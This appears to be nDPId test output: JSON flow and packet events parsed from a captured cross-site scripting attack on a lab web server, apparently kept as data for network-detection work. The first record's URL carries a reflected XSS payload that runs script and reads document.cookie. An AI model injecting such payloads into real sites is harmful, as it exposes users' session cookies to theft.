{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347296462,"flow_last_seen":1499347296462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347296462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1499347296462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TjBAAD4Gd6CsEAABwKgKMtmGAFCTXWbOAAAAAKACchBgyQAAAgQFtAQCCAoBOij+AAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1499347296462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2YaJqN5wk11mz6AScSD7NQAAAgQFtAQCCAoD4\/p1AToo\/gEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":3,"flow_last_seen":1499347296463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347296463,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TjFAAD4Gd6esEAABwKgKMtmGAFCTXWbPiajecYAQAOWaPAAAAQEICgE6KP8D4\/p1"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347297732,"flow_last_seen":1499347297732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347297732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1499347297732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347297732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LW1AAD4GmGOsEAABwKgKMtmUAFB7SgdRAAAAAKACchDXDQAAAgQFtAQCCAoBOio8AAAAAAEDAwc="} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1499347297733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347297733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ZST\/kF5e0oHUqAScSAC3wAAAgQFtAQCCAoD4\/uyAToqPAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1499347297733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347297733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LW5AAD4GmGqsEAABwKgKMtmUAFB7SgdSk\/5BeoAQAOWh5gAAAQEICgE6KjwD4\/uy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347300263,"flow_last_seen":1499347300263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347300263,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1499347300263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347300263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bohAAD4GV0isEAABwKgKMtmuAFBvk0I9AAAAAKACchClRQAAAgQFtAQCCAoBOiy1AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1499347300263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347300263,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2a7Gy0E5b5NCPqAScSCcEAAAAgQFtAQCCAoD4\/4rATostQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1499347300264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347300264,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bolAAD4GV0+sEAABwKgKMtmuAFBvk0I+xstBOoAQAOU7GAAAAQEICgE6LLUD4\/4r"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347301520,"flow_last_seen":1499347301520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347301520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1499347301520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347301520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80Q9AAD4G9MCsEAABwKgKMtm8AFCdpvzgAAAAAKACchC7RgAAAgQFtAQCCAoBOi3vAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1499347301520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347301520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2bw9W3Mnnab84aAScSAIWgAAAgQFtAQCCAoD4\/9lATot7wEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2784,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1499347301521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347301521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00RBAAD4G9MesEAABwKgKMtm8AFCdpvzhPVtzKIAQAOWnYQAAAQEICgE6Le8D4\/9l"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347304125,"flow_last_seen":1499347304125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347304125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1499347304125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347304125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hKxAAD4GQSSsEAABwKgKMtnWAFBzErTWAAAAAKACchArQAAAAgQFtAQCCAoBOjB6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1499347304125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347304125,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2dawo5LBcxK016AScSDi5QAAAgQFtAQCCAoD5AHwATowegEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":3,"flow_last_seen":1499347304126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347304126,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hK1AAD4GQSusEAABwKgKMtnWAFBzErTXsKOSwoAQAOWB7AAAAQEICgE6MHsD5AHw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347305402,"flow_last_seen":1499347305402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347305402,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1499347305402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347305402,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z+xAAD4GXeSsEAABwKgKMtnkAFD8k1ZWAAAAAKACchD+8AAAAgQFtAQCCAoBOjG6AAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1499347305402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347305402,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2eSBOT6p\/JNWV6AScSA42QAAAgQFtAQCCAoD5AMwAToxugEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1499347305403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347305403,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z+1AAD4GXeusEAABwKgKMtnkAFD8k1ZXgTk+qoAQAOXX4AAAAQEICgE6MboD5AMw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347306680,"flow_last_seen":1499347306680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347306680,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1499347306680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347306680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t61AAD4GDiOsEAABwKgKMtnyAFBPt4VUAAAAAKACchB7ggAAAgQFtAQCCAoBOjL5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1499347306680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347306680,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2fJOMjqdT7eFVaAScSDrPgAAAgQFtAQCCAoD5ARvAToy+QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1499347306680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347306680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t65AAD4GDiqsEAABwKgKMtnyAFBPt4VVTjI6noAQAOWKRgAAAQEICgE6MvkD5ARv"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347309314,"flow_last_seen":1499347309314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347309314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1499347309314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347309314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V4pAAD4GbkasEAABwKgKMtoMAFADiWIGAAAAAKACchDoUQAAAgQFtAQCCAoBOjWMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1499347309314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347309314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2gztcSluA4liB6AScSDHagAAAgQFtAQCCAoD5AcCATo1jAEDAwc="} 
